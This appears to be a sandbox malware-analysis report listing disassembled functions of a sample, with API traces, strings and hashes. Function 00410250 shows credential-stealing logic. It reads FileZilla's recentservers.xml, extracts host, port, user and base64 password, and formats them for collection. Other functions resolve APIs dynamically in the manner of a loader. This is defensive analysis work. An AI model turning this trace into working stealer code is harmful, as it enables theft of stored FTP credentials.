Instruction Fuzzy Hash: DC3149B691060ADFDB20CF99C880BAEBBF5FF48724F14404AD441A7614D7B1EA45CBA4

Function 022AF8F1 Relevance: 1.6, APIs: 1, Instructions: 63fileCOMMON

Download Yara Rule

APIs

Part of subcall function 022BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022BA9EF

Part of subcall function 022BAB87: lstrcpy.KERNEL32(00000000,?), ref: 022BABD9
Part of subcall function 022BAB87: lstrcat.KERNEL32(00000000), ref: 022BABE9

Part of subcall function 022BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022BAC2C
Part of subcall function 022BAC17: lstrcpy.KERNEL32(00000000), ref: 022BAC6B
Part of subcall function 022BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022BAC79

Part of subcall function 022BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022BAB6C

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 022AF985
StrCmpCA.SHLWAPI(?,004215BC), ref: 022AF9D6
StrCmpCA.SHLWAPI(?,004215C0), ref: 022AF9EC
FindNextFileA.KERNEL32(000000FF,?), ref: 022AFD18
FindClose.KERNEL32(000000FF), ref: 022AFD2A

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 3334442632-0
Opcode ID: dbc33d9263c12bccf2023e6a26364f15308e1a9a0f3d34f169b2ef739c1ce31c
Instruction ID: fcfdb4cfbf8b14b049028f26331b2b86f7a5cbfdf3e58261a066c9731e5f4443
Opcode Fuzzy Hash: dbc33d9263c12bccf2023e6a26364f15308e1a9a0f3d34f169b2ef739c1ce31c
Instruction Fuzzy Hash: 7711E13082030DABCB2AEBE4DD649ED7336AF21340F4042AAA51A56599EF342B48CF50

Function 022BD151 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(0041CEA8), ref: 022BD156

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
Instruction ID: f83a9dfad8d9090bd4b69b445eb29f9fdcf7b9edf99be21673d757649d1b517e
Opcode Fuzzy Hash: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
Instruction Fuzzy Hash: 3B9002753912104A471417755D496C52A905E9D6067624861B506C4054DB988044551A

Function 0041CEEA Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0001CEA8), ref: 0041CEEF

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
Instruction ID: f83a9dfad8d9090bd4b69b445eb29f9fdcf7b9edf99be21673d757649d1b517e
Opcode Fuzzy Hash: f6481f596078bcb1dd932f2aa3c62ef353472a79660b18b0fa4186fad086ce80
Instruction Fuzzy Hash: 3B9002753912104A471417755D496C52A905E9D6067624861B506C4054DB988044551A

Function 00752B77 Relevance: 1.3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

Strings

+u, xrefs: 00752B7D

Memory Dump Source

Source File: 00000000.00000002.2204131536.0000000000751000.00000040.00000020.00020000.00000000.sdmp, Offset: 00751000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_751000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID:
String ID: +u
API String ID: 0-2794428999
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: 5f08f2a7b02cb82b8d26dc134a58070a649f4765a3a82ce9ca7c6c11c89fe80f
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: 78117CB2740100AFD744DF55DC81EE673EAEB89321B298069ED08CB312E6B9EC42C760

Function 022A0D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: 7859ca23dae42045a41e6d7d825e027845e6c18eb0d072417fa76e253868cad8
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: 58012B736206008FDF21CFA0C914FAA33F9FB86305F0540B5E906D7645E370AA41CB80

Function 022B99B7 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90

Function 00419750 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90

Function 022BD1D3 Relevance: 107.7, APIs: 86, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

free.MSVCRT ref: 022BD1E7
free.MSVCRT ref: 022BD1EF
free.MSVCRT ref: 022BD1F7
free.MSVCRT ref: 022BD1FF
free.MSVCRT ref: 022BD207
free.MSVCRT ref: 022BD20F
free.MSVCRT ref: 022BD216
free.MSVCRT ref: 022BD21E
free.MSVCRT ref: 022BD226
free.MSVCRT ref: 022BD22E
free.MSVCRT ref: 022BD236
free.MSVCRT ref: 022BD23E
free.MSVCRT ref: 022BD246
free.MSVCRT ref: 022BD24E
free.MSVCRT ref: 022BD256
free.MSVCRT ref: 022BD25E
free.MSVCRT ref: 022BD269
free.MSVCRT ref: 022BD271
free.MSVCRT ref: 022BD279
free.MSVCRT ref: 022BD281
free.MSVCRT ref: 022BD289
free.MSVCRT ref: 022BD291
free.MSVCRT ref: 022BD299
free.MSVCRT ref: 022BD2A1
free.MSVCRT ref: 022BD2A9
free.MSVCRT ref: 022BD2B1
free.MSVCRT ref: 022BD2B9
free.MSVCRT ref: 022BD2C1
free.MSVCRT ref: 022BD2C9
free.MSVCRT ref: 022BD2D1
free.MSVCRT ref: 022BD2D9
free.MSVCRT ref: 022BD2E1
free.MSVCRT ref: 022BD2EF
free.MSVCRT ref: 022BD2FA
free.MSVCRT ref: 022BD305
free.MSVCRT ref: 022BD310
free.MSVCRT ref: 022BD31B
free.MSVCRT ref: 022BD326
free.MSVCRT ref: 022BD331
free.MSVCRT ref: 022BD33C
free.MSVCRT ref: 022BD347
free.MSVCRT ref: 022BD352
free.MSVCRT ref: 022BD35D
free.MSVCRT ref: 022BD368
free.MSVCRT ref: 022BD373
free.MSVCRT ref: 022BD37E
free.MSVCRT ref: 022BD389
free.MSVCRT ref: 022BD394
free.MSVCRT ref: 022BD3A2
free.MSVCRT ref: 022BD3AD
free.MSVCRT ref: 022BD3B8
free.MSVCRT ref: 022BD3C3
free.MSVCRT ref: 022BD3CE
free.MSVCRT ref: 022BD3D9
free.MSVCRT ref: 022BD3E4
free.MSVCRT ref: 022BD3EF
free.MSVCRT ref: 022BD3FA
free.MSVCRT ref: 022BD405
free.MSVCRT ref: 022BD410
free.MSVCRT ref: 022BD41B
free.MSVCRT ref: 022BD426
free.MSVCRT ref: 022BD431
free.MSVCRT ref: 022BD43C
free.MSVCRT ref: 022BD447
free.MSVCRT ref: 022BD455
free.MSVCRT ref: 022BD460
free.MSVCRT ref: 022BD46B
free.MSVCRT ref: 022BD476
free.MSVCRT ref: 022BD481
free.MSVCRT ref: 022BD48C
free.MSVCRT ref: 022BD497
free.MSVCRT ref: 022BD4A2
free.MSVCRT ref: 022BD4AD
free.MSVCRT ref: 022BD4B8
free.MSVCRT ref: 022BD4C3
free.MSVCRT ref: 022BD4CE
free.MSVCRT ref: 022BD4D9
free.MSVCRT ref: 022BD4E4
free.MSVCRT ref: 022BD4EF
free.MSVCRT ref: 022BD4FA
free.MSVCRT ref: 022BD508
free.MSVCRT ref: 022BD513
free.MSVCRT ref: 022BD51E
free.MSVCRT ref: 022BD529
free.MSVCRT ref: 022BD534
free.MSVCRT ref: 022BD53F

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
Instruction ID: 135032675c1c3faf63ad7e1c5d8a58c18586287da0a5e8c8ba847f193e87bd00
Opcode Fuzzy Hash: 4243eb4f7a4797f88c21eec07c423483bd74b8336bdd1fff1b24957b34ad7449
Instruction Fuzzy Hash: 2B71E431471B42EBE76B3BB1DD01ECA7AA37F04382F184924B1DB28534DE326865AF51

Function 00410250 Relevance: 77.4, APIs: 32, Strings: 12, Instructions: 363stringmemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788

Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B

Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982

Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905

Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12

Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6

Part of subcall function 004099C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004099EC
Part of subcall function 004099C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A11
Part of subcall function 004099C0: LocalAlloc.KERNEL32(00000040,?), ref: 00409A31
Part of subcall function 004099C0: ReadFile.KERNEL32(000000FF,?,00000000,004102E7,00000000), ref: 00409A5A
Part of subcall function 004099C0: LocalFree.KERNEL32(004102E7), ref: 00409A90
Part of subcall function 004099C0: CloseHandle.KERNEL32(000000FF), ref: 00409A9A

Part of subcall function 00418E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418E52

strtok_s.MSVCRT ref: 0041031B
GetProcessHeap.KERNEL32(00000000,000F423F,00420DBA,00420DB7,00420DB6,00420DB3), ref: 00410362
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410369
StrStrA.SHLWAPI(00000000,<Host>), ref: 00410385
lstrlenA.KERNEL32(00000000), ref: 00410393

Part of subcall function 004188E0: malloc.MSVCRT ref: 004188E8
Part of subcall function 004188E0: strncpy.MSVCRT ref: 00418903

StrStrA.SHLWAPI(00000000,<Port>), ref: 004103CF
lstrlenA.KERNEL32(00000000), ref: 004103DD
StrStrA.SHLWAPI(00000000,<User>), ref: 00410419
lstrlenA.KERNEL32(00000000), ref: 00410427
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00410463
lstrlenA.KERNEL32(00000000), ref: 00410475
lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 00410502
lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041051A
lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 00410532
lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041054A
lstrcatA.KERNEL32(?,browser: FileZilla,?,?,00000000), ref: 00410562
lstrcatA.KERNEL32(?,profile: null,?,?,00000000), ref: 00410571
lstrcatA.KERNEL32(?,url: ,?,?,00000000), ref: 00410580
lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410593
lstrcatA.KERNEL32(?,00421678,?,?,00000000), ref: 004105A2
lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004105B5
lstrcatA.KERNEL32(?,0042167C,?,?,00000000), ref: 004105C4
lstrcatA.KERNEL32(?,login: ,?,?,00000000), ref: 004105D3
lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004105E6
lstrcatA.KERNEL32(?,00421688,?,?,00000000), ref: 004105F5
lstrcatA.KERNEL32(?,password: ,?,?,00000000), ref: 00410604
lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410617
lstrcatA.KERNEL32(?,00421698,?,?,00000000), ref: 00410626
lstrcatA.KERNEL32(?,0042169C,?,?,00000000), ref: 00410635
strtok_s.MSVCRT ref: 00410679
lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 0041068E
memset.MSVCRT ref: 004106DD

Strings

<User>, xrefs: 00410410
login: , xrefs: 004105CA
password: , xrefs: 004105FB
NA, xrefs: 0041072E, 004106AF, 004106B2
profile: null, xrefs: 00410568
\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 004102A4
<Port>, xrefs: 004103C6
browser: FileZilla, xrefs: 00410559
<Pass encoding="base64">, xrefs: 0041045A
url: , xrefs: 00410577
<Host>, xrefs: 0041037C
NA, xrefs: 004102CC, 004102F2, 004102CF, 004102F5

Memory Dump Source

Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$CloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$NA$NA$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
API String ID: 337689325-514892060
Opcode ID: 24a6a77c51899f0f0ad4d5ee2bcc125a881a5e765c72c69dc46a4671f7c1426f
Instruction ID: d15eb70b6d553ab1cc94bc99ca27928082ec116ada4a7d19c18b432e65637ade
Opcode Fuzzy Hash: 24a6a77c51899f0f0ad4d5ee2bcc125a881a5e765c72c69dc46a4671f7c1426f
Instruction Fuzzy Hash: 86D16D75A41208ABCB04FBF1DD86EEE7379FF14314F50441EF102A6091DE78AA96CB69

Function 022B9AC7 Relevance: 73.7, APIs: 33, Strings: 9, Instructions: 212libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(0064A8B0,0064A204), ref: 022B9B08
GetProcAddress.KERNEL32(0064A8B0,0064A5C8), ref: 022B9B21
GetProcAddress.KERNEL32(0064A8B0,0064A644), ref: 022B9B39
GetProcAddress.KERNEL32(0064A8B0,0064A264), ref: 022B9B51
GetProcAddress.KERNEL32(0064A8B0,0064A250), ref: 022B9B6A
GetProcAddress.KERNEL32(0064A8B0,0064A2F8), ref: 022B9B82
GetProcAddress.KERNEL32(0064A8B0,ct), ref: 022B9B9A
GetProcAddress.KERNEL32(0064A8B0,0064A33C), ref: 022B9BB3
GetProcAddress.KERNEL32(0064A8B0,0064A5A0), ref: 022B9BCB
GetProcAddress.KERNEL32(0064A8B0,0064A548), ref: 022B9BE3
GetProcAddress.KERNEL32(0064A8B0,0064A3BC), ref: 022B9BFC
GetProcAddress.KERNEL32(0064A8B0,0064A2E8), ref: 022B9C14
GetProcAddress.KERNEL32(0064A8B0,@et), ref: 022B9C2C
GetProcAddress.KERNEL32(0064A8B0, u), ref: 022B9C45
GetProcAddress.KERNEL32(0064A8B0,0064A598), ref: 022B9C5D
GetProcAddress.KERNEL32(0064A8B0,`et), ref: 022B9C75
GetProcAddress.KERNEL32(0064A8B0,0064A418), ref: 022B9C8E
GetProcAddress.KERNEL32(0064A8B0,0064A634), ref: 022B9CA6
GetProcAddress.KERNEL32(0064A8B0,0064A0BC), ref: 022B9CBE
GetProcAddress.KERNEL32(0064A8B0,0064A12C), ref: 022B9CD7
GetProcAddress.KERNEL32(0064A8B0,bt), ref: 022B9CEF
LoadLibraryA.KERNEL32(0064A550,?,022B6C67), ref: 022B9D01
LoadLibraryA.KERNEL32(0064A17C,?,022B6C67), ref: 022B9D12
LoadLibraryA.KERNEL32(0064A104,?,022B6C67), ref: 022B9D24
LoadLibraryA.KERNEL32(0064A1DC,?,022B6C67), ref: 022B9D36
LoadLibraryA.KERNEL32(8u,?,022B6C67), ref: 022B9D47
GetProcAddress.KERNEL32(0064A6D4,0064A4AC), ref: 022B9D69
GetProcAddress.KERNEL32(0064A7F4,Pu), ref: 022B9D8A
GetProcAddress.KERNEL32(0064A7F4,hu), ref: 022B9DA2
GetProcAddress.KERNEL32(0064A8E4,0064A394), ref: 022B9DC4
GetProcAddress.KERNEL32(0064A7A8, ct), ref: 022B9DE5
GetProcAddress.KERNEL32(0064A7D8,0064A414), ref: 022B9E06
GetProcAddress.KERNEL32(0064A7D8,00420724), ref: 022B9E1D

Strings

ct, xrefs: 022B9B8D, 022B9B93
`et, xrefs: 022B9C68, 022B9C6E
Pu, xrefs: 022B9D7D, 022B9D82
u, xrefs: 022B9C37, 022B9C3D
8u, xrefs: 022B9D41, 022B9D46
@et, xrefs: 022B9C1F, 022B9C25
bt, xrefs: 022B9CE2, 022B9CE7
ct, xrefs: 022B9DD8, 022B9DDD
hu, xrefs: 022B9D95, 022B9D9B

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: u$ ct$8u$@et$Pu$`et$hu$bt$ct
API String ID: 2238633743-4032915498
Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
Instruction ID: f5d0f23fbaf8dac15f08467e2b0881976a8dc43505c500d6cdef67f39fc35545
Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
Instruction Fuzzy Hash: EFA13CBD5D0240BFE364EFE8ED88A963BFBF74E301714661AE605C3264D6399441DB12

Function 022A4827 Relevance: 51.1, APIs: 34, Instructions: 114stringmemoryCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00424DA0), ref: 022A4833
lstrlen.KERNEL32(00424E50), ref: 022A483E
lstrlen.KERNEL32(00424F18), ref: 022A4849
lstrlen.KERNEL32(00424FD0), ref: 022A4854
lstrlen.KERNEL32(00425078), ref: 022A485F
GetProcessHeap.KERNEL32(00000000,?), ref: 022A486E
RtlAllocateHeap.NTDLL(00000000), ref: 022A4875
lstrlen.KERNEL32(00425120), ref: 022A4883
lstrlen.KERNEL32(004251C8), ref: 022A488E
lstrlen.KERNEL32(00425270), ref: 022A4899
lstrlen.KERNEL32(00425318), ref: 022A48A4
lstrlen.KERNEL32(004253C0), ref: 022A48AF
lstrlen.KERNEL32(00425468), ref: 022A48C3
lstrlen.KERNEL32(00425510), ref: 022A48CE
lstrlen.KERNEL32(004255B8), ref: 022A48D9
lstrlen.KERNEL32(00425660), ref: 022A48E4
lstrlen.KERNEL32(00425708), ref: 022A48EF
lstrlen.KERNEL32(004257B0), ref: 022A4918
lstrlen.KERNEL32(00425858), ref: 022A4923
lstrlen.KERNEL32(00425920), ref: 022A492E
lstrlen.KERNEL32(004259C8), ref: 022A4939
lstrlen.KERNEL32(00425A70), ref: 022A4944
strlen.MSVCRT ref: 022A4957
lstrlen.KERNEL32(00425B18), ref: 022A497F
lstrlen.KERNEL32(00425BC0), ref: 022A498A
lstrlen.KERNEL32(00425C68), ref: 022A4995
lstrlen.KERNEL32(00425D10), ref: 022A49A0
lstrlen.KERNEL32(00425DB8), ref: 022A49AB
lstrlen.KERNEL32(00425E60), ref: 022A49BB
lstrlen.KERNEL32(00425F08), ref: 022A49C6
lstrlen.KERNEL32(00425FB0), ref: 022A49D1
lstrlen.KERNEL32(00426058), ref: 022A49DC
lstrlen.KERNEL32(00426100), ref: 022A49E7
VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 022A4A03

Memory Dump Source

Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd

Yara matches

Similarity

API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
String ID:
API String ID: 2127927946-0
Opcode ID: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
Instruction ID: d8eefe834ba6e1c1e9dec50cfd70b234234eee6fe4ae3617271860d3fd71b948
Opcode Fuzzy Hash: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
Instruction Fuzzy Hash: A041A779740624EBC718AFE5EC89B987F71AB4C712BA0C062F90299190CBF5D5119B3E

Function 022B04B7 Relevance: 48.4, APIs: 32, Instructions: 363stringmemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 022BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022BA9EF

Part of subcall function 022B9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 022B9072

Part of subcall function 022BAB87: lstrcpy.KERNEL32(00000000,?), ref: 022BABD9
Part of subcall function 022BAB87: lstrcat.KERNEL32(00000000), ref: 022BABE9

Part of subcall function 022BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022BAB6C

Part of subcall function 022BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022BAC2C
Part of subcall function 022BAC17: lstrcpy.KERNEL32(00000000), ref: 022BAC6B
Part of subcall function 022BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022BAC79

Part of subcall function 022BAA07: lstrcpy.KERNEL32(?,00000000), ref: 022BAA4D

Part of subcall function 022A9C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 022A9C53
Part of subcall function 022A9C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 022A9C78
Part of subcall function 022A9C27: LocalAlloc.KERNEL32(00000040,?), ref: 022A9C98
Part of subcall function 022A9C27: ReadFile.KERNEL32(000000FF,?,00000000,022A16F6,00000000), ref: 022A9CC1
Part of subcall function 022A9C27: LocalFree.KERNEL32(022A16F6), ref: 022A9CF7
Part of subcall function 022A9C27: CloseHandle.KERNEL32(000000FF), ref: 022A9D01

Part of subcall function 022B9097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 022B90B9

strtok_s.MSVCRT ref: 022B0582
GetProcessHeap.KERNEL32(00000000,000F423F,00420DBA,00420DB7,00420DB6,00420DB3), ref: 022B05C9
RtlAllocateHeap.NTDLL(00000000), ref: 022B05D0
StrStrA.SHLWAPI(00000000,00421618), ref: 022B05EC
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022B05FA

Part of subcall function 022B8B47: malloc.MSVCRT ref: 022B8B4F
Part of subcall function 022B8B47: strncpy.MSVCRT ref: 022B8B6A

StrStrA.SHLWAPI(00000000,00421620), ref: 022B0636
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022B0644
StrStrA.SHLWAPI(00000000,00421628), ref: 022B0680
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022B068E
StrStrA.SHLWAPI(00000000,00421630), ref: 022B06CA
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022B06DC
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022B0769
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022B0781
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022B0799
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022B07B1
lstrcat.KERNEL32(?,0042164C), ref: 022B07C9
lstrcat.KERNEL32(?,00421660), ref: 022B07D8
lstrcat.KERNEL32(?,00421670), ref: 022B07E7
lstrcat.KERNEL32(?,00000000), ref: 022B07FA
lstrcat.KERNEL32(?,00421678), ref: 022B0809
lstrcat.KERNEL32(?,00000000), ref: 022B081C
lstrcat.KERNEL32(?,0042167C), ref: 022B082B
lstrcat.KERNEL32(?,00421680), ref: 022B083A
lstrcat.KERNEL32(?,00000000), ref: 022B084D
lstrcat.KERNEL32(?,00421688), ref: 022B085C
lstrcat.KERNEL32(?,0042168C), ref: 022B086B
lstrcat.KERNEL32(?,00000000), ref: 022B087E
lstrcat.KERNEL32(?,00421698), ref: 022B088D
lstrcat.KERNEL32(?,0042169C), ref: 022B089C
strtok_s.MSVCRT ref: 022B08E0
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022B08F5
memset.MSVCRT ref: 022B0944

Memory Dump Source

